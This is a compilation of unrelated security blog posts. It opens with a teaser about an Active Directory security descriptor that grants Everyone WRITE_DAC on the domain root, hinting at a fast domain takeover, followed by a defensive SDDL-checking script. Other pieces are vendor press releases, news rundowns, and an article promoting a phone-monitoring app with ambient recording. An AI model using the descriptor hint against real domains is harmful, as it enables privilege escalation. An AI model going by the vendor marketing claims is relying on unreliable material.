(A;;RP;;;WD)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(A;;RPLCLORC;;;AU)(A;;RPWPCRLCLOCCRCWDWOSW;;;DA)(A;CI;RPWPCRLCLOCCRCWDWOSDSW;;;BA)(A;;RPWPCRLCLOCCDCRCWDWOSDDTSW;;;SY)(A;CI;RPWPCRLCLOCCDCRCWDWOSDDTSW;;;EA)(A;CI;LC;;;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU) (A;CI;RPWDLCLO;;;WD)(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;RU) (OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RPLCLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(A;;RC;;;RU)(OA;CIIO;RPLCLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)

Today, this one little question and the technicality I have shared above directly impacts the cyber security of the entire world.


If you read my words very carefully, as you always should, then you'll find that it shouldn't take an astute cyber security professional more than a minute to figure it out, given that I’ve actually already provided the answer above.


Today, the CISO of every organization in the world, whether it be a government, a military or a billion dollar company (of which there are a dime a dozen, and in fact thousands worldwide) or a trillion dollar company MUST know the answer to this question.


They must know the answer because it directly impacts and threatens the foundational cyber security of their organizations.

If they don't, (in my opinion) they likely shouldn't be the organization's CISO because what I have shared above could possibly be the single biggest threat to 85% of organizations worldwide, and it could be used to completely compromise them within minutes (and any organization that would like a demo in their real-world environment may feel free to request one.)

Some of you will have figured it out. For the others, I'll finally shed light on the answer soon.

Best wishes,
Sanjay


PS: If you need to know right away, perhaps you should give your Microsoft contact a call and ask them. If they too need some help (they likely will ;-)), tell them it has to do with a certain security descriptor in Active Directory. (There, now that's a HINT the size of a domain, and it could get an intruder who's been able to breach an organization's network perimeter to root in seconds.)

PS2: If this intrigues you, and you wish to learn more, you may want to read this - Hello World :-)
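To make the hint above concrete for anyone who wants to check a descriptor for themselves, here is an added example, written for this page rather than taken from the post or from any product of its author. It parses the DACL string quoted earlier using the two-letter SDDL abbreviations that Microsoft documents, and reports any allow ACE that hands a broad trustee (Everyone, Authenticated Users, Domain Users and similar aliases) a write-class right. The string embedded as POST_DACL is the one from the post; which trustees count as "broad" and which rights count as "write-class" is my classification for this example, not a Microsoft definition. One documented fact worth keeping in mind while reading it: in SDDL, the code WD means WRITE_DAC when it appears in the rights field and Everyone when it appears in the trustee field.

```python
import re
from dataclasses import dataclass
from typing import List

# Two-letter SDDL access-right codes (Microsoft's documented abbreviations).
RIGHTS = {
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE",
    "GX": "GENERIC_EXECUTE", "RC": "READ_CONTROL", "SD": "DELETE",
    "WD": "WRITE_DAC", "WO": "WRITE_OWNER", "CC": "CREATE_CHILD",
    "DC": "DELETE_CHILD", "LC": "LIST_CHILDREN", "SW": "SELF_WRITE",
    "RP": "READ_PROPERTY", "WP": "WRITE_PROPERTY", "DT": "DELETE_TREE",
    "LO": "LIST_OBJECT", "CR": "CONTROL_ACCESS",
}

# Two-letter SDDL trustee aliases. "WD" here is Everyone; the same two
# letters in the rights field mean WRITE_DAC.
TRUSTEES = {
    "WD": "Everyone", "AU": "Authenticated Users", "AN": "Anonymous",
    "BU": "Builtin Users", "BG": "Builtin Guests", "DU": "Domain Users",
    "DA": "Domain Admins", "EA": "Enterprise Admins",
    "BA": "Builtin Administrators", "SY": "Local System",
    "ED": "Enterprise Domain Controllers",
    "RU": "Pre-Windows 2000 Compatible Access",
}

# Assumption (my classification for this example, not Microsoft's):
# trustees that cover essentially every principal able to bind to the
# directory, and rights that let the holder alter an object, its security
# descriptor, or its children.
BROAD_TRUSTEES = {"WD", "AU", "AN", "BU", "BG", "DU"}
WRITE_CLASS = {"GA", "GW", "WD", "WO", "WP", "CC", "DC", "SD", "DT", "CR", "SW"}


@dataclass
class Ace:
    ace_type: str      # A = allow, D = deny, OA = object allow, ...
    flags: List[str]   # CI, OI, IO, NP, ID, ...
    rights: List[str]  # two-letter codes, or a single "0x..." raw mask
    object_guid: str   # control-access right / property / class GUID
    inherit_guid: str  # inherited object type GUID
    trustee: str       # SID alias or literal S-1-... SID


def _pairs(s: str) -> List[str]:
    """Split a run of two-letter SDDL codes into a list."""
    s = s.strip()
    if s.startswith("0x"):
        return [s]  # raw access mask; left undecoded here
    if len(s) % 2:
        raise ValueError(f"odd-length SDDL code run: {s!r}")
    return [s[i:i + 2] for i in range(0, len(s), 2)]


def parse_sddl_aces(dacl: str) -> List[Ace]:
    """Parse every (...) ACE in an SDDL DACL; stray whitespace between ACEs is ignored."""
    aces = []
    for body in re.findall(r"\(([^)]*)\)", dacl):
        parts = body.split(";")
        if len(parts) != 6:
            raise ValueError(f"malformed ACE: ({body})")
        ace_type, flags, rights, obj, inh, trustee = (p.strip() for p in parts)
        aces.append(Ace(ace_type, _pairs(flags), _pairs(rights), obj, inh, trustee))
    return aces


def dangerous_aces(dacl: str) -> List[Ace]:
    """Allow ACEs that hand a broad trustee a write-class right."""
    return [
        ace for ace in parse_sddl_aces(dacl)
        if ace.ace_type in ("A", "OA")        # deny and audit ACEs grant nothing
        and ace.trustee in BROAD_TRUSTEES
        and set(ace.rights) & WRITE_CLASS
    ]


def describe(ace: Ace) -> str:
    who = TRUSTEES.get(ace.trustee, ace.trustee)
    rights = ", ".join(RIGHTS.get(r, r) for r in ace.rights)
    scope = "inherits to child objects" if "CI" in ace.flags else "this object only"
    return f"{who}: {rights} ({scope})"


# Sample input: the DACL string quoted in the post, reproduced verbatim.
POST_DACL = (
    "(A;;RP;;;WD)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    "(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    "(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)"
    "(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)"
    "(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)"
    "(A;;RPLCLORC;;;AU)(A;;RPWPCRLCLOCCRCWDWOSW;;;DA)"
    "(A;CI;RPWPCRLCLOCCRCWDWOSDSW;;;BA)(A;;RPWPCRLCLOCCDCRCWDWOSDDTSW;;;SY)"
    "(A;CI;RPWPCRLCLOCCDCRCWDWOSDDTSW;;;EA)(A;CI;LC;;;RU)"
    "(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)"
    "(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)"
    "(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU) "
    "(A;CI;RPWDLCLO;;;WD)"
    "(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;RU) "
    "(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)"
    "(OA;CIIO;RPLCLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(A;;RC;;;RU)"
    "(OA;CIIO;RPLCLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)"
)

if __name__ == "__main__":
    for ace in dangerous_aces(POST_DACL):
        print(describe(ace))
```

Run against the post's string, the checker reports exactly one ACE, and reading its trustee and rights fields side by side explains the "two WDs in the same (pl)ACE" remark. To run it against a real domain head, pull the descriptor on a domain-joined machine with the ActiveDirectory module, for instance (Get-Acl "AD:\DC=example,DC=com").Sddl with your own domain DN substituted; the O:/G: owner and group prefix that call returns is not parenthesised and is simply skipped by the parser. Two caveats: this only catches grants made directly to the well-known broad aliases, so it will miss a literal S-1-5-... SID or a custom group that happens to contain everyone, and it does not evaluate inheritance from parent containers or deny ACEs that might override an allow. It is a first-pass triage, not a full effective-access calculation.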

Veracode CEO Sam King Recognized in WomenInc. Magazine’s 2019 Top Influential Corporate Directors

We're thrilled to announce that Veracode Chief Executive Officer Sam King has been named one of WomenInc. Magazine's 2019 Most Influential Corporate Directors!

Honoring influencers, achievers, and executives, this announcement recognizes women who are making notable contributions to the world of business and technology. The list compiled by WomenInc. Magazine includes over 700 directors serving on the boards of S&P 1000/Mid-Cap publicly held companies.

To celebrate these accomplished leaders, WomenInc. maintains an exclusive online directory of honorees and publishes their yearly announcement in seasonal editions of the magazine.

King is recognized for her contributions on behalf of Progress Software, the leading provider of application development and digital experience technologies. Since joining the Board of Directors in February 2018, she has contributed to the implementation of Progress' business strategy as well as its charter to operate as a socially responsible organization.

She is also a well-known expert in cybersecurity and is a founding member of the Veracode team. She helped lead the establishment and evolution of the application security category alongside industry experts and analysts. Veracode is the largest independent application security provider worldwide, valued at $1 billion.

"It is essential that the achievements and success of professional women are showcased in the highest regard and their stories are told in meaningful ways," said Catrina Young, the Executive Vice President and Chief Communications Officer of WomenInc. "We are proud that we can recognize this distinguished group of women and we are inspired by their accomplishments, their distinguished careers and the corporations that demonstrate an inclusive board composition. We offer our congratulations."

Encouraging positive dialogue from influential female voices in leadership, WomenInc. Magazine is a media platform dedicated to fostering the ideas, events, social commentary, and stories that inspire professional women.

To see the full list of honorees, visit the directory here or grab a copy of WomenInc.'s winter issue from your local newsstand.

Security at DevOps Speed: How Veracode Reduces False Positives

Originally Published on November 27, 2017 -- Updated on January 7, 2020

Application security solutions that slow or stall the development process simply aren't feasible in a DevOps world. AppSec will increasingly need to fit as seamlessly as possible into developer processes, or it will be under-used or overlooked. But overlooking AppSec puts your organization at high risk of a damaging breach. Our most recent State of Software Security report found that a whopping 83 percent of apps had at least one vulnerability on initial scan. Leaving your code vulnerable leaves your organization open to breach. In the end, you need AppSec, but you also need AppSec that developers will use. Reduction of false positives is a big part of this requirement. False positives are always a key concern because they make developers and security folks spin their wheels, so solutions should minimize them as much as possible.

How Veracode Works to Reduce False Positives

We aim for full automation and high speeds for all of our scans, but that doesn't mean that we compromise on quality. Unique to our position as a SaaS provider, our security research team regularly samples customer app submissions to manually review flaws. This ensures that we have met our standards for accuracy in terms of both false positives and negatives. By reviewing actual customer apps, we get a much broader and realistic set of cases than would be possible in a QA lab that only tests applications built as internal test cases.

Our review of these applications leads to improvements that are implemented back into our static analysis engine.

The SaaS Advantage

As a native SaaS provider, Veracode has a strategic advantage in improving false-positive rates. To date, we've assessed over 13.5 trillion lines of code and performed more than 4 million scans, and with every release, our solution gets smarter. On-premises solutions, on the other hand, require their customers to manually create custom rules to adjust for false positives in their vendor's software, which can be very time consuming and complicated, or to wait for their on-premises vendor to release a new revision to the scanner, which requires downtime and unplanned work for the security teams. We at Veracode improve our static analysis engine at least monthly, and improvements we have made by observing the behavior of all customer applications are available with minimal disruption to your processes.

The result for our customers is that they get very high quality at high speeds (89 percent of our scans finish in less than an hour), without having to train and maintain a team for customizing scan rules to avoid false positives. This rule customization can be costly and time consuming, and requires a skill set that is hard to come by. In addition, customizations can be challenging to maintain if the person who wrote the code leaves the company. Finally, rule customization can muddy results for attestations: it's hard to prove to third parties that your apps are secure if anyone can rig the results by manipulating rules.

On the other hand, our false-positive rate is a low 1.1 percent, with zero rule customizing. This 1.1 percent false positive rate across real-world applications is verified and based on feedback from our customers on vulnerabilities they have reviewed. By comparison, our competitors claim a 32 percent false positive rate.

Bottom Line

The Veracode solution has scanned hundreds of thousands of enterprise, mobile and cloud-based apps, and we've helped our customers fix more than 48 million flaws. Bottom line? Better analytics, faster improvements, increased accuracy and the ability to create more software, more securely than ever before.

Find out more about the Veracode Application Security solution.

Cybercrime is moving towards smartphones – this is what you could do to protect your company

By 2021, cybercrimes will cost companies USD 6 trillion, according to a study.

The number of internet users has grown from an estimated 2 billion in 2015 to 4.4 billion in 2019, but so have the cybercrimes, which are expected to cost companies USD 6 trillion worldwide, according to a study by Cybersecurity Ventures.

Similarly, the number of smartphone users has grown from 2.5 billion in 2016 to 3.2 billion in 2019 and is forecasted to grow to 3.8 billion by 2021. Smartphones and the internet will make further inroads to our economic system. But there are certain risks involved as well.

Mobile phones are becoming targets of cybercriminals because of their widespread use and increasing computing power. Consider the fact that more than 60% of online fraud occurs through mobile phones. This threat is not just to individual users but to businesses as well, and it does not matter how large the company is either: 43% of the cyberattacks in 2019 were aimed at smaller businesses because they do not have adequate protection.

Given how vulnerable smartphones are and that the threat from cyber attacks is only expected to increase, here are some measures you can take to protect your business from cybercriminals:

Rethink BYOD:

Bring Your Own Device (BYOD) offers several benefits to both the organization and employees. Such a policy allows employees at a company to use their own mobile phones, tablets, or laptops for work, saving companies the hassle of purchasing devices.

However, you need to rethink if you are saving more than what you are losing. Employees have confidential company information on their devices. Such a door into your organization can cost you heavily. Set aside the funds to obtain company devices for use by employees at the office. Consider such an investment as part of your cybersecurity strategy.


Cybersecurity assessments:

The cybersecurity threat landscape is ever-evolving due to the fast nature of innovation. Develop a comprehensive cybersecurity program that includes a regular assessment of your company’s security needs. Identify the strengths of your IT infrastructure against potential attacks, and do not let advances in technology or techniques take that away from you. Similarly, you should identify the vulnerabilities in your systems. Make sure any gaps in your defenses are appropriately plugged. A threat assessment should be an integral component of any cybersecurity policy.

Retrain staff:

Make sure that employees at your organization are informed and up to date on the latest in cyber threats. This way they can protect themselves and the company from cybercriminals. Even a single mistake by one employee can end up creating a door for individuals or groups wishing your company harm. All employees must be trained as a matter of policy. This way, they can identify phishing attacks and manage social engineering scams. Another factor your employees must be mindful of is resource monitoring. Suspicious resource use on company devices, whether it is excess internet or battery usage, should raise alarm bells. However, employees may not look into such things in detail because they do not own the devices. Train your staff to keep track of resource use too.


Employee monitoring:

Most organizations have some form of employee monitoring policy and track their workers. If you haven't done so already, develop such a policy, and keep your employees informed to ensure transparency. If you have decided to use company devices, you can opt to install monitoring apps on them. There are several modern monitoring apps currently available, such as XNSPY. The app can keep track of online activities, generate a list of call logs, and remotely control the device. Furthermore, you can track the location of the device in real time and use features such as geofencing and GPS history. There are other powerful features too, such as ambient recording, multimedia access, and online activity tracking. You can also wipe all the data from a device in case of theft. Monitoring apps such as XNSPY should be a part of your strategy against cybercriminals.


Don’t forget physical infrastructure:

Cybersecurity may involve software updates and training policies, but making sure your physical infrastructure is safe is just as important. Re-evaluate how exposed your digital infrastructure is to physical access. Furthermore, go through the profiles of suppliers and vendors to vet them properly. A small door in any piece of equipment can let cybercriminals through and bypass your entire cybersecurity foundation. Be aware of this threat and make sure that suppliers work by following specific regulations.

Develop a threat monitoring policy:

Anticipating an attack and stopping it is an important part of comprehensive cybersecurity policy. Make sure that you are monitoring your digital infrastructure round the clock.

Invest in threat monitoring software and a team of professionals that can identify, track, and stop an attack.

The concept of designing a cybersecurity system as a fortification is changing to an adaptable system that can accommodate evolving security threats. Furthermore, a monitoring policy also needs to have a clear response plan.

Such a plan details what needs to happen and when in case of an attack. This ensures that there is a speedy response by your company against any threat.

 Conclusion:

Smartphones have become powerful enough that they can be considered as computers in their own right. While this has created scores of opportunities, there are also clear threats posed by cybercrime. These threats are only going to increase as the internet and smartphone use increases. While protecting your business against cyber criminals requires a considerable investment of time and money, it will pay off in the long run.


Clark Thomas is an expert in VoIP. He helps businesses, both small and medium-sized, in implementing and adopting the best security methods for their organization and network. He gives advice on, and assists people with, boosting the security measures for their website and business.

The post Cybercrime is moving towards smartphones – this is what you could do to protect your company appeared first on CyberDB.

What is Active Directory? (Cyber Security 101 for the Entire World)

Folks,

Today is January 06, 2020, and as promised, here I am getting back to sharing perspectives on cyber security.


Cyber Security 101

Perhaps a good topic to kick off the year is by seeking to ask and answer a simple yet vital question - What is Active Directory?

You see, while this question may seem simple to some (and it is), it's one of the most important questions to answer adequately, because in an adequate answer to this most simple question lies the key to organizational cyber security worldwide.

The simple reason for this is that if you were to ask most CISOs or IT professionals, they'll likely tell you that Active Directory is the "phone book" of an organization's IT infrastructure, and while it's true that at its simplest it is a directory of all organizational accounts and computers, it is this shallow view that leads organizations to greatly diminish the real value of Active Directory, to the point of sheer irresponsible cyber negligence, because "Who really cares about just a phone book?"

In fact, for two decades now, this has been the predominant view held by most CISOs and IT personnel worldwide, and sadly the negligence resulting from such a simplistic view of Active Directory is likely the reason that the Active Directory deployments of most organizations remain substantially insecure and vastly vulnerable to compromise today.

Again, after all, who cares about a phone book?!




Active Directory - The Very Foundation of Organizational Cyber Security Worldwide

If, as they say, "A Picture is Worth a Thousand Words", perhaps I should paint you a very simple Trillion $ picture -


An organization's Active Directory deployment is its single most valuable IT and corporate asset, worthy of the highest protection at all times, because it is the very foundation of an organization's cyber security.

The entirety of an organization's very building blocks of cyber security i.e. all the organizational user accounts and passwords used to authenticate their people, all the security groups used to aggregate and authorize access to all their IT resources, all their privileged user accounts, all the accounts of all their computers, including all laptops, desktops and servers are all stored, managed and secured in (i.e. inside) the organization's foundational Active Directory, and all actions on them audited in it.

In other words, should an organization's foundational Active Directory, or a single Active Directory privileged user account, be compromised, the entirety of the organization could be exposed to the risk of complete, swift and colossal compromise.



Active Directory Security Must Be Organizational Cyber Security Priority #1

Today, ensuring the highest protection of an organization's foundational Active Directory deployment must undoubtedly be the #1 priority of every organization that cares about cyber security, protecting shareholder value and business continuity.


Here's why - A deeper, detailed look into What is Active Directory ?


For anyone to whom this may still not be clear, I'll spell it out - just about everything in organizational Cyber Security, whether it be Identity and Access Management, Privileged Access Management, Network Security, Endpoint Security, Data Security, Intrusion Detection, Cloud Security, Zero Trust etc. ultimately relies and depends on Active Directory (and its security.)



In essence, today every organization in the world is only as secure as is its foundational Active Directory deployment, and from the CEO to the CISO to an organization's shareholders, employees and customers, everyone should know this cardinal fact.

Best wishes,
Sanjay.

Top 9 challenges IT leaders will face in 2020

This year will assuredly see tech leaders laser-focused once again on digital initiatives, but the processes they have in place for doing so won’t be a slam dunk for success. Worse, recent research suggests that mistakes born of digital transformation are a top cause of concern for businesses. 

A Gartner report on emerging risks shows that while companies continue to prioritize and fund digital initiatives, two-thirds not only fail to deliver on their promises but also reveal “enterprise weaknesses, causing organizations to see a gap between expectations and results.”


Cyber News Rundown: US Coast Guard Hit with Ransomware

Reading Time: ~ 2 min.

US Coast Guard Facility Hit with Ransomware

During the last week of December a US Coast Guard facility was the target of a Ryuk ransomware attack that shut down operations for over 30 hours. Though the Coast Guard has implemented multiple cybersecurity regulations in just the last six months or so, this attack broke through the weakest link in the security chain: human users. Ryuk typically spreads through an email phishing campaign that relies on the target clicking on a malicious link before spreading through a network.

Crypto-trading Platform Forces Password Reset After Possible Leak

Officials for Poloniex, a cryptocurrency trading platform, began pushing out forced password resets after a list of email addresses and passwords claiming to be from Poloniex accounts was discovered on Twitter. While the company was able to verify that many of the addresses found on the list weren't linked to their site at all, they still opted to issue password resets for all clients. It's still unclear where the initial list actually originated, but it was likely generated from a previous data leak and was being used on a new set of websites.

Cybersecurity Predictions for 2020: What Our Experts Have to Say

850 Wawa Stores Affected by Card-skimming

Nearly every one of Wawa's 850 stores in the U.S. was found to be infected with payment card-skimming malware for roughly eight months before the company discovered it. It appears Wawa only found out about the problem after Visa issued a warning about card fraud at gas pumps that still use less-secure magnetic stripes. Wawa has since begun offering credit monitoring to anyone affected. In a statement, the company mentions that skimming occurred on in-store transactions as well, so chip cards would only have helped if the malware had operated at the device level rather than at the transaction point.

Microsoft Takes Domains from North Korean Hackers

Microsoft recently retook control of 50 domains that were being used by North Korean hackers to launch cyberattacks. Following a successful lawsuit, Microsoft was able to use its extensive tracking data to shut down phishing sites that mainly targeted the U.S., Japan, and South Korea. The tech company is well-known for this tactic, having taken down 84 domains belonging to the Russian hacking group Fancy Bear and seizing almost 100 domains linked to Iranian spies.

Landry’s Suffers Payment Card Breach

One of the largest restaurant chain and property owners, Landry's, recently disclosed that many of its locations were potentially affected by a payment card leak through their point-of-sale systems. The company discovered that from January through October of 2019, cards at any of its roughly 600 locations could have been exposed to card-skimming malware if they were not processed through a main payment terminal that supported end-to-end encryption.

The post Cyber News Rundown: US Coast Guard Hit with Ransomware appeared first on Webroot Blog.

SC Media Inducts Veracode into its 2019 Innovator Hall of Fame

We are excited to announce that Veracode has been inducted into SC Media's 2019 Innovator Hall of Fame. To select the honorees, the SC Media team leverages data from SC Labs testing groups, conferences, research, and referrals. The team then evaluates the nominees against strict criteria to ensure that the final selection is comprised of vendors with the most promising products and capabilities.

We're honored to be one of only five new Hall of Fame inductees!

To announce its innovators, SC Media publishes an annual eBook highlighting the selected vendors' greatest strengths.

"We interviewed each vendor to understand the security problems they identified and mitigated with their latest innovations," the SC Media editors wrote. "Almost every organization pointed to two interrelated struggles: exhausting technological 'noise' and personnel fatigue." This leaves security operations centers understaffed, overwhelmed, and frustrated, they continued.

"The vendors on this list understand these problems and recognize how such issues inhibit business operations and user experiences. They have responded with two helpful solutions: advanced automation and threat prioritization. Many platforms include artificial intelligence and machine learning that recognize patterns and can replicate remediation processes in the future to remove the manual burden from SOCs. Many new solutions also can determine whether a noted threat poses significant or minimal risk and adjust alert policies accordingly. In nearly every case, both automation and threat prioritization are integrated into a platform that can then easily integrate with existing infrastructures, making the transition to these nextgen solutions quick and easy," the editors said.

Veracode was selected as an honoree in the Virtualization and cloud-based security category. The description said, in part:

The Veracode Platform provides an entire system of testing, scans and analysis that minimizes the presence of vulnerabilities and produces more secure software as a result. Veracode knows that vendors want to develop, use and sell software with confidence. By integrating into the development process multiple testing techniques, including static, dynamic and software composition analysis, the Veracode Platform can anticipate many potential vulnerabilities and resolve them before they ever materialize in a software's final form.

Veracode also differentiates itself as a SaaS provider, according to SC Media, saying the model "makes Veracode versatile enough for local and global use, even by organizations with highly distributed personnel or partners."

The recognition went on to say:

Veracode hopes to influence the cybersecurity ecosystem as well as the organizations they serve, so that vulnerability prevention becomes not just one possible solution amidst a series of alternatives but a standard step in software development procedures. All enterprises developing their own applications will likely benefit from the security measures integrated into the Veracode platform.

Veracode is also recognized for its ability to ease the workload of security and development teams by integrating multiple testing techniques into the development process. This strength is making a positive cultural impact on the perception of cybersecurity measures.

To learn more about our induction into the Innovator Hall of Fame, check out SC Media's eBook, Innovators. For additional information on our comprehensive suite of products and services, visit the Veracode homepage.

Cyber Security Roundup for January 2020

A roundup of UK focused cyber and information security news stories, blog posts, reports and threat intelligence from the previous calendar month, December 2019.

Happy New Year! The final month of the decade was a pretty quiet one as major security news and data breaches go, given that cyber attacks have become the norm in the past decade. The biggest UK media security story was saved for the very end of 2019, with the freshly elected UK government apologising after it had accidentally published online the addresses of the 1,097 New Year Honour recipients. Among the addresses posted were those of Sir Elton John, cricketer and BBC 'Sports Personality of the Year' Ben Stokes, former Conservative Party leader Iain Duncan Smith, 'Great British Bakeoff Winner' Nadiya Hussain, and former Ofcom boss Sharon White. The Cabinet Office said it was "looking into how this happened", which probably comes down to a 'user error' in my view.

An investigation by The Times found that hedge funds had been eavesdropping on the Bank of England's press conferences before their official broadcast after its internal systems were compromised. Hedge funds were said to have gained a significant advantage over rivals by purchasing access to an audio feed of Bank of England news conferences. The Bank said it was "wholly unacceptable" and that it was investigating further. The Times claimed those paying for the audio feed, via the third party, would receive details of the Bank's news conferences up to eight seconds before those using the television feed, potentially making them money. It is alleged the supplier charged each client a subscription fee and up to £5,000 per use. The system, which had been misused by the supplier since earlier this year, was installed in case the Bloomberg-managed television feed failed.

A video showing a hacker talking to a young girl in her bedroom via her family's Ring camera was shared on social media. The hacker tells the young girl: "It's Santa. It's your best friend." The Motherboard website reported hackers were offering software making it easier to break into such devices. Ring owner Amazon said the incident was not related to a security breach, but that the compromise was due to credential stuffing, stating "Due to the fact that customers often use the same username and password for their various accounts and subscriptions, bad actors often re-use credentials stolen or leaked from one service on other services."


Ransomware continued to plague multiple industries throughout 2019, and even security companies aren't immune: Spanish security company Prosegur was reported to have been taken down by the Ryuk ransomware.

Finally, a Microsoft Security Intelligence Report concluded what all security professionals know well: implementing Multi-Factor Authentication (MFA) would have thwarted the vast majority of identity attacks. The Microsoft study found that reusing passwords across multiple account-based services is still common: of nearly 30 million users and their passwords examined, password reuse and modifications were common for 52% of users. The same study also found that 30% of the modified passwords and all the reused passwords can be cracked within just 10 guesses. This behaviour puts users at risk of being victims of a breach replay attack. Once a threat actor gets hold of spilled credentials or credentials in the wild, they can try to execute a breach replay attack. In this attack, the actor tries out the same credentials on different service accounts to see if there is a match.
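As an added example (not from this post or the Microsoft report), a password-change check that rejects the kind of trivial modification the study describes, such as bumping a year or swapping a letter for a look-alike symbol; the normalisation rules, the character substitutions and the edit-distance threshold are my own assumptions:

```python
"""Reject a new password that is only a predictable edit of the old one.

Added example modelling the 'modified password' pattern from the Microsoft
study. The substitution table, the decoration regex and the edit threshold
are assumptions chosen for illustration, not a published standard.
"""
import re

# Look-alike substitutions users commonly apply when "changing" a password.
LEET = str.maketrans("01345@$", "oieasas")
# Digits and punctuation that typically get bumped at either end (Summer2019!).
DECOR = re.compile(r"^[\d!?.#_*-]+|[\d!?.#_*-]+$")


def core(password: str) -> str:
    """Lower-case, strip leading/trailing decorations, undo leet swaps."""
    return DECOR.sub("", password.lower()).translate(LEET)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; fine for password-length strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_trivial_variant(old: str, new: str, max_edits: int = 2) -> bool:
    """True when `new` is a predictable mutation of `old` and should be refused."""
    if new == old:
        return True
    a, b = core(old), core(new)
    if a == b:
        return True
    # One core embedded in the other (pass -> password), ignoring very short cores.
    if min(len(a), len(b)) >= 4 and (a in b or b in a):
        return True
    return edit_distance(old.lower(), new.lower()) <= max_edits


if __name__ == "__main__":
    # Constructed sample pairs, not real credentials.
    for old, new in [("Summer2019!", "Summer2020!"), ("Password1", "P@ssw0rd2"),
                     ("Winter2019", "correct-horse-battery-staple")]:
        verdict = "reject" if is_trivial_variant(old, new) else "accept"
        print(f"{old!r} -> {new!r}: {verdict}")
```

A check like this belongs beside a breached-password lookup and MFA, not in place of them: it stops the user-side mutation the study measured, while credential stuffing against reused passwords is only stopped by a second factor.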

BLOG
NEWS 
VULNERABILITIES AND SECURITY UPDATES
AWARENESS, EDUCATION AND THREAT INTELLIGENCE